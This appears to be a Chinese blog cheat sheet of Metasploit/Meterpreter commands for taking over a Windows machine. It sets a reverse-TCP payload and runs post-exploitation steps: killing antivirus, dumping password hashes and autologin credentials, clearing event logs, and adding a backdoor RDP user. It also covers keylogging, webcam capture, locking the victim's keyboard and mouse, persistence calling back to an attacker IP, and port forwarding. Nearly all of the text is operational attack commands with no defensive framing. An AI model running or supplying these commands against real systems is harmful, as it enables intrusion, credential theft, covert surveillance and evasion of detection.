网安渗透1

渗透命令大全

use 0

set payload windows/x64/meterpreter/reverse_tcp

set rhosts 192.168.132.32

run

后执行下面

chcp 65001                                         #shell 编码乱码

run post/windows/manage/migrate                    #自动进程迁移    

run post/windows/gather/checkvm                    #查看目标主机是否运行在虚拟机上    

run post/windows/manage/killav                     #关闭杀毒软件    

run post/windows/manage/enable_rdp                 #开启远程桌面服务    

run post/windows/manage/autoroute                  #查看路由信息    

run post/windows/gather/enum_logged_on_users       #列举当前登录的用户    

run post/windows/gather/enum_applications          #列举应用程序    

run windows/gather/credentials/windows_autologin   #抓取自动登录的用户名和密码    

run windows/gather/smart_hashdump                  #dump出所有用户的hash

clearev                                            #清除事件日志

sysinfo                #查看目标主机系统信息

run scraper            #查看目标主机详细信息

run hashdump           #导出密码的哈希

load kiwi             #加载

ps                    #查看目标主机进程信息

pwd                 #查看目标当前目录(windows)

getlwd                #查看目标当前目录(Linux)

search -f *.jsp -d e:\                  #搜索E盘中所有以.jsp为后缀的文件

download  e:\test.txt  /root            #将目标机的e:\test.txt文件下载到/root目录下

upload    /root/test.txt d:\test       #/root/test.txt上传到目标机的 d:\test\ 目录下

getpid                 #查看当前Meterpreter Shell的进程

PIDmigrate 1384                                             #将当前Meterpreter Shell的进程迁移到PID1384的进程上

idletime               #查看主机运行时间

getuid                #查看获取的当前权限

getsystem             #提权

run  killav           #关闭杀毒软件

screenshot            #截图

webcam_list           #查看目标主机的摄像头

webcam_snap           #拍照

webcam_stream         #开视频

execute  参数  -f 可执行文件       #执行可执行程序

run getgui -u hack -p 123        #创建hack用户,密码为123

run getgui -e                       #开启远程桌面

keyscan_start                  #开启键盘记录功能

keyscan_dump                   #显示捕捉到的键盘记录信息

keyscan_stop                     #停止键盘记录功能

uictl  disable  keyboard       #禁止目标使用键盘

uictl  enable   keyboard       #允许目标使用键盘

uictl  disable  mouse          #禁止目标使用鼠标

uictl  enable   mouse          #允许目标使用鼠标

load                          #使用扩展库

run                 #使用扩展库

run persistence -X -i 5 -p 8888 -r 192.168.10.27  #反弹时间间隔是5s 会自动连接

portfwd add -l 3389 -r 192.168.11.13 -p 3389      #192.168.11.133389端口转发到本地的3389端口上,这里的192.168.11.13是获取权限的主机的ip地址

clearev                        #清除日志

  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

白天的我最菜

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值